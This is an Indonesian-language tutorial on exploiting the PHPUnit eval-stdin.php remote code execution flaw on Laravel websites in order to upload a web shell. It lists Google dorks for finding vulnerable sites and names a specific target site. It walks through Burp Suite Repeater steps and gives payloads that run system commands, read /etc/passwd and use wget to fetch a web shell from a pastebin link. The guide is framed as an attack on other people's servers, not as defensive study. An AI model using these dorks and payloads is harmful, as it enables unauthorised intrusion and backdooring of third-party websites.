Tutorial / Cara Upload Shell Metode Laravel phpUnit to RCE( Remote Code Execution ) dengan BurpSuite

  • Pertama siapkan :
    -
    BurpSuite ( download di google banyak )
    -
    Browser

  • Dorking di google :
    - inurl:vendor/phpunit/phpunit/src/
    - inurl:/src/Util/PHP/ intitle:index of
    - inurl:/Util/PHP/ "eval-stdin.php"
    * kembangin lagi biar dapet target lebih fresh


  • Exploit : /eval-stdin.php
    site.co.li/vendor/phpunit/phpunit/src/Util/PHP/eval.stdin.php
    * kalau blank putih berarti vuln
  • Oke langsung aja, disini gua udh dapet targetnya :
    http://www.olapcemetery.com//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • Buka BurpSuite > ke menu Proxy > pilih Intercept > nyalakan Intercept ( Intercept On )

  • Lalu kalian buka target yang tadi, dan buka BurpSuite lagi.

  • Jika sudah seperti ini, klik kanan dan pilih Send to Repeater / Ctrl + R
    Masuk ke Repeater, lihat kolom kiri adalah requestnya dan responsnya berada di sebelah kanan.
  • Nah sekarang saatnya mengeksekusi :v
  • Masukkan payload <?php system('ls');?> di kolom request, gunanya agar melihat isi dalam dir /PHP/ atau bisa juga dengan <?php system('tail /etc/passwd');?> untuk melihat isi dari /etc/passwd nya, terus klik " Go ".

    Nanti kalo bisa di eksekusi bakal muncul responsnya disebelah kanan, lihat gambar.
    Kalo gamuncul berarti gbs di eksekusi.











  • Langsung aja kita tusbool gan dgn perintah wget buat manggil shell kita

    <?php system('wget link shell lu -o px.php'); ?>
         atau lu bisa pake link shell gua
    <?php system('wget https://pastebin.com/raw/E5fXkdyC -o px.php'); ?>
    Nb : px.php bisa ganti terserah kamu, buat namain file shell yg kita upload











  • Nah shell px.php gua udh ke upload, tinggal buka aja deh :*


  • Shell telah terupload :V